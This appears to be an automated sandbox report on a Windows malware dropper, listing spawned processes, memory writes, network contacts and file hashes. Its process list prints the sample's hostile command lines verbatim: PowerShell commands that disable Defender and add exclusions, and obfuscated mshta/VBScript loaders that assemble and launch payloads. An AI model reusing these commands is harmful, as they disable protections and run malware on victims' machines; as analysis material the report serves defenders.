Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cd42a7c874e44.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1600 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1600 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1600 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1600 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1600 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1600 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1600 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1708 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe
PID 1708 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe
PID 1708 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe
PID 1708 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe
PID 1708 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe
PID 1708 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe
PID 1708 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe
PID 2752 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2752 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe

"C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19ac3c92c21.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c9e031f4.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1932df4dae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193e530416b51740a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c28f648204dbd4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1968b7ee9058232e8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue196397c0f84f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue192c34b1c2f5.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue197e9ec0ff0.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193129b31e741ef3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19cef5687a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19d1fc7d2654d7a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19cd42a7c874e44.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b4b38a7569a9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c28f648204dbd4.exe

Tue19c28f648204dbd4.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe

Tue19b4b38a7569a9.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cd42a7c874e44.exe

Tue19cd42a7c874e44.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19ac3c92c21.exe

Tue19ac3c92c21.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue197e9ec0ff0.exe

Tue197e9ec0ff0.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe

Tue196397c0f84f8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19cef5687a.exe

Tue19cef5687a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe

Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe

Tue1932df4dae.exe

C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp

"C:\Users\Admin\AppData\Local\Temp\is-N4M2S.tmp\Tue196397c0f84f8.tmp" /SL5="$80192,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe

Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1968b7ee9058232e8.exe

Tue1968b7ee9058232e8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe

Tue19c9e031f4.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue192c34b1c2f5.exe

Tue192c34b1c2f5.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe

Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193129b31e741ef3.exe

Tue193129b31e741ef3.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19c9e031f4.exe"

C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp

"C:\Users\Admin\AppData\Local\Temp\is-OPMRD.tmp\Tue196397c0f84f8.tmp" /SL5="$A019E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue196397c0f84f8.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19f40f8518b9946.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 488

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue1932df4dae.exe") do taskkill -iM "%~nXx" /f

C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe

~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Tue1932df4dae.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y .\bENCc.E

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19d1fc7d2654d7a.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 marianu.xyz udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 www.listincode.com udp
US 54.205.158.59:443 www.listincode.com tcp
US 8.8.8.8:53 propanla.com udp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 52.203.72.196:443 www.listincode.com tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FR 51.178.186.149:80 tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
N/A 127.0.0.1:49277 tcp
N/A 127.0.0.1:49279 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 telegka.top udp
US 104.155.138.21:80 telegka.top tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 107.178.223.183:80 telegka.top tcp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
US 72.84.118.132:8080 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 104.155.138.21:80 telegka.top tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
US 72.84.118.132:8080 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 107.178.223.183:80 telegka.top tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.82:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.qxsgxd.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
US 104.155.138.21:80 telegka.top tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 107.178.223.183:80 telegka.top tcp
NL 45.9.20.13:80 tcp
FI 135.181.129.119:4805 tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 d0fbd06f5709db11a8b2449a1b919251
SHA1 83f4610e15b613668b9ebad734dbc2f8fbefc614
SHA256 e94188908546b2f00a506d7596d3673b814ab62173967b3d258422877bc56f84
SHA512 c82970a78fba054ec6e9a962a43ca6fb94ddd3a0d744dd5b9d04a014f541e6da8038497c2ba15403df12600372cb624caf6e672eeac6915f680b062efeae1e8b

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\setup_install.exe

MD5 c10ba859e90df8a8d8e7dcc8dfe5ac20
SHA1 92d43cc9db4e8e70d0eaf7f3406bad818f4a27c5
SHA256 6c77a4d421de0321d74ec8d3fca02e782ac035ef471b1218471f139557e3a023
SHA512 00fd1f5656cac70d0c769c8752d52a46f5ef3f93a10ee87f5e8ee63edd20e2d9c22cbf4f6123a835c701b432527821731e6bbc0b42b0fa5e41a52ca232d28d2a

\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zSCA6369D6\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2752-72-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2752-87-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2752-89-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2752-88-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2752-86-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2752-85-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCA6369D6\Tue19b4b38a7569a9.exe

MD5 26278caf1df5ef5ea045185380a1d7c9
SHA1 df16e31d1dd45dc4440ec7052de2fc026071286c
SHA256 d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5
SHA512 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03

